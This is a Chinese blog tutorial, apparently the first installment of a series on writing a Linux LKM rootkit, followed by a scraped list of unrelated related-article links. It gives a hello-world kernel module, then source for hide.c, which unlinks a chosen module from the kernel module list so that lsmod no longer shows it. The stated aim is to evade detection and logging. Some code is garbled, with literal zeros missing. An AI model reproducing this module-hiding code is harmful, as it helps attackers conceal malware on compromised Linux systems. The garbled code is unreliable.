唉,一开始在纠结起个什么名字,感觉名字常常的很装逼,于是起了个这《手把手教你写LKM rookit》

  我觉得: 你们觉得:。。。。。。

开始之前,我们先来理解一句话:一切的操作都是系统调用。系统通过陷入或者库的方式,让你跟内核的函数交互。当然啦,平时我们都处在用户态的情况下,系统调用调用的是内核态的函数,ps:这个系列完了,我们从内核级的rookit脱离出来,升级到bios级别的rootkit,哇卡卡~~

那么我在这傻了吧唧的讲了半天,什么是LKM,Loadable Kernel Modules,翻译过来就是“可加载内核模块程序”。

系统调用一般来处理什么I/O请求啦,进程管理啦,内存管理啊之类的,你想想原来你原来程序有个函数a,调用的是底层的函数b,你把函数b拦截了替换了一个函数c。。。。

我的系统调用号的定义在 /usr/include/asm-generic/unistd.h 文件中

#include <asm/bitsperlong.h>

/*

 * This file contains the system call numbers, based on the

 * layout of the x86-64 architecture, which embeds the

 * pointer to the syscall in the table.

 *

 * As a basic principle, no duplication of functionality

 * should be added, e.g. we don't use lseek when llseek

 * is present. New architectures should use this file

 * and implement the less feature-full calls in user space.

 */

#ifndef __SYSCALL

#define __SYSCALL(x, y)

#endif

#if __BITS_PER_LONG == 32 || defined(__SYSCALL_COMPAT)

#define __SC_3264(_nr, _32, _64) __SYSCALL(_nr, _32)

#else

hello.c这个以后会成为功能性的主文件

 #include <linux/module.h>

 #include <linux/init.h>

 #include <linux/kernel.h>

 #include <linux/list.h>

 #include <linux/string.h>

 #include <linux/moduleparam.h>

 MODULE_LICENSE ("GPL");

 MODULE_AUTHOR("l137");

 MODULE_DESCRIPTION("test");

 static int fuck_init(void){

     printk(KERN_ALERT "come on baby!!");

     return ;

 }

 static void fuck_exit(void){

     printk(KERN_ALERT "bye-bye\n");

 }

 module_init(fuck_init);

 module_exit(fuck_exit)

hello.c

Makefile:

obj-m += hello.o

all:

        make -C /lib/modules/`uname -r`/build M=`pwd` modules

clean:

        make -C /lib/modules/`uname -r`/build M=`pwd` clean

make之后得到hello.ko文件sudo insmod hello.ko可加载此模块,用rmmod hello删除模块,用dmesg可以查看到我的模块的remove_init函数的执行情况。

[  333.890125] come on baby!!

liet@kali:~/code/c/study/lkm$ lsmod | grep hello

hello 12417 0

至此你的第一个内核级的hello出来了,接下来我们来隐藏它,我们写的是rootkit,当然不能让别人lsmod就能看到,以后日志也不要有

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

hide.c

#include <linux/module.h>

#include <linux/init.h>

#include <linux/kernel.h>

#include <linux/list.h>

#include <linux/string.h>

#include <linux/moduleparam.h>

MODULE_LICENSE ("GPL");

MODULE_AUTHOR("l137");

MODULE_DESCRIPTION("test");

static char *mod_name = "hello";

module_param(mod_name, charp, );

static int remove_init(void){

    struct module *mod_head,*mod_counter;

    struct list_head *p;

    mod_head = &__this_module;

    list_for_each(p, &mod_head->list){

        mod_counter = list_entry(p, struct module, list);

        if(strcmp(mod_counter->name, mod_name) == ){

            list_del(p);

            printk("removetree module %s ok!\n",mod_name);

            return ;

        }

    }

    printk("Can't find module %s.\n",mod_name);

    return ;

}

static void remove_exit(void){

    printk(KERN_ALERT "hide say : bye-bye\n");

}

module_init(remove_init);

module_exit(remove_exit);

Makefile跟hello的Makefile一样,改个名字就行

当第一个模块添加后,添加sudo insmod hide.ko,

dmesg一下看到

[ 333.890125] come on baby!!removetree module hello ok!,

这个时候你lsmod发现你的hello不见了,其实它还在。。。。。。

后面我们会往这里面添加些好玩的功能,让这个rootkit强大起来!!

  

手把手教你写LKM rookit! 之 第一个lkm程序及模块隐藏(一)的更多相关文章

  1. 手把手教你写Sublime中的Snippet

    手把手教你写Sublime中的Snippet Sublime Text号称最性感的编辑器, 并且越来越多人使用, 美观, 高效 关于如何使用Sublime text可以参考我的另一篇文章, 相信你会喜 ...

  2. 手把手教你写电商爬虫-第三课 实战尚妆网AJAX请求处理和内容提取

    版权声明:本文为博主原创文章,未经博主允许不得转载. 系列教程: 手把手教你写电商爬虫-第一课 找个软柿子捏捏 手把手教你写电商爬虫-第二课 实战尚妆网分页商品采集爬虫 看完两篇,相信大家已经从开始的 ...

  3. 手把手教你写电商爬虫-第四课 淘宝网商品爬虫自动JS渲染

    版权声明:本文为博主原创文章,未经博主允许不得转载. 系列教程: 手把手教你写电商爬虫-第一课 找个软柿子捏捏 手把手教你写电商爬虫-第二课 实战尚妆网分页商品采集爬虫 手把手教你写电商爬虫-第三课 ...

  4. 只有20行Javascript代码!手把手教你写一个页面模板引擎

    http://www.toobug.net/article/how_to_design_front_end_template_engine.html http://barretlee.com/webs ...

  5. [原创]手把手教你写网络爬虫(4):Scrapy入门

    手把手教你写网络爬虫(4) 作者:拓海 摘要:从零开始写爬虫,初学者的速成指南! 封面: 上期我们理性的分析了为什么要学习Scrapy,理由只有一个,那就是免费,一分钱都不用花! 咦?怎么有人扔西红柿 ...

  6. [原创]手把手教你写网络爬虫(5):PhantomJS实战

    手把手教你写网络爬虫(5) 作者:拓海 摘要:从零开始写爬虫,初学者的速成指南! 封面: 大家好!从今天开始,我要与大家一起打造一个属于我们自己的分布式爬虫平台,同时也会对涉及到的技术进行详细介绍.大 ...

  7. [原创]手把手教你写网络爬虫(7):URL去重

    手把手教你写网络爬虫(7) 作者:拓海 摘要:从零开始写爬虫,初学者的速成指南! 封面: 本期我们来聊聊URL去重那些事儿.以前我们曾使用Python的字典来保存抓取过的URL,目的是将重复抓取的UR ...

  8. Android开发之手把手教你写ButterKnife框架(三)

    欢迎转载,转载请标明出处: http://blog.csdn.net/johnny901114/article/details/52672188 本文出自:[余志强的博客] 一.概述 上一篇博客讲了, ...

  9. Android开发之手把手教你写ButterKnife框架(二)

    欢迎转载,转载请标明出处: http://blog.csdn.net/johnny901114/article/details/52664112 本文出自:[余志强的博客] 上一篇博客Android开 ...

随机推荐

  1. jquery 设置style:display 其实很方便的

    ("#id").css('display','none'); $("#id").css('display','block'); 或 $("#id&qu ...

  2. TCP/IP协议原理与应用笔记17:IP编址(重点)

    1. IP地址(通用标识符) 对于同一个网络设备(主机或路由器)的不同网络连接,需要不同的IP地址进行标识 2. 主机标识符 主要有下面三种方式的主机标识方式: (1)Name:是什么,可读性强(了解 ...

  3. 仿UC浏览器图片加载进度条

    前几天用UC浏览器看新闻(无意中给UC打了广告),看到它的图片加载进度条,正好最近有时间,所以就自己写了一个. 效果图如下 进度条的底色和填充颜色都可以调整. 首先中间的笑脸作为一个整体,其实现代码如 ...

  4. zlib导致Ubuntu登录管理器失效

    ubuntu版本:10.04 现象:开机之后无法启动登录管理器. 原因:zlib与登录管理器冲突. 解决:卸载zlib.

  5. Inaccurate values for “Currently allocated space” and “Available free space” in the Shrink File dialog for TEMPDB only

    转载自:http://blogs.msdn.com/b/ialonso/archive/2012/10/08/inaccurate-values-for-currently-allocated-spa ...

  6. ZOJ 3122 Sudoku

    Sudoku Time Limit:10000MS     Memory Limit:32768KB     64bit IO Format:%lld & %llu Submit Status ...

  7. QTREE 树链剖分---模板 spoj QTREE

    <树链剖分及其应用> 一文讲得非常清楚,我一早上就把他学会了并且A了这题的入门题. spoj QTREE 题目: 给出一棵树,有两种操作: 1.修改一条边的边权. 2.询问节点a到b的最大 ...

  8. css3 文本记

    css3 文本 在css文本功能上主要分为三大类:字体,颜色和文本. text-shadow 设置文本阴影 text-shadow:color x-offset y-offset blur-radiu ...

  9. Android第三方授权(新浪微博篇)

    Android第三方认证新浪微博,相对微信,也比较简单,并且sina给了一个sdk和sdkdemo,这个demo封装了许多,但是自己不准备记录这个demo,而是直接使用sdk 同样去sina官方下载s ...

  10. ansible安装(批量执行命令

    rpm安装 下载epl源 :  Download the latest epel-release rpm from:http://dl.fedoraproject.org/pub/epel/6/x86 ...